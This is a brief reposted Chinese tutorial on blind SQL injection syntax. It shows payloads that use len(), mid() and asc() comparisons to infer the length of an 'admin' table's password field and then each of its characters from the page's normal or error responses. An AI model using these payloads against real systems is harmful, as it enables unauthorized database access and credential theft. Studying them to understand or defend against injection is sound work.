sql盲注語法

本文轉載自查看原文 2019-09-11 10:09 494 sql注入

如果頁面沒有顯錯數字，則用盲注語法根據頁面變化來判斷數據內容

獲取數據長度：

and (select top 1 len(列名) from 表名)>5
and (select top 1 len(password) from admin)>16//錯誤
and (select top 1 len(password) from admin)>15//正常

獲取指定位數的數據：

and (select top 1 asc(mid(列名,位置,1)) from 表名)>97
and (select top 1 asc(mid(admin,1,1)) from admin)>96//判斷admin字段的內容第一位的ascii碼值大於96 正常
and (select top 1 asc(mid(admin,1,1)) from admin)>97//判斷admin字段的內容第一位的ascii碼值大於97 錯誤 說明就是97

mid(字符串,截取的位置,截取字符數)
asc(） //將字符轉換成ascii碼 方便進行比較

免責聲明！

本站轉載的文章為個人學習借鑒使用，本站對版權不負任何法律責任。如果侵犯了您的隱私權益，請聯系本站郵箱yoyou2525@163.com刪除。

猜您在找 sql注入——盲注 sql盲注講解 sql注入---盲注 SQL盲注 SQL盲注——時間注入 SQL注入——布爾盲注 SQL盲注修訂建議 SQL基於時間的盲注過程 SQL盲注的簡單分析基於時間型SQL盲注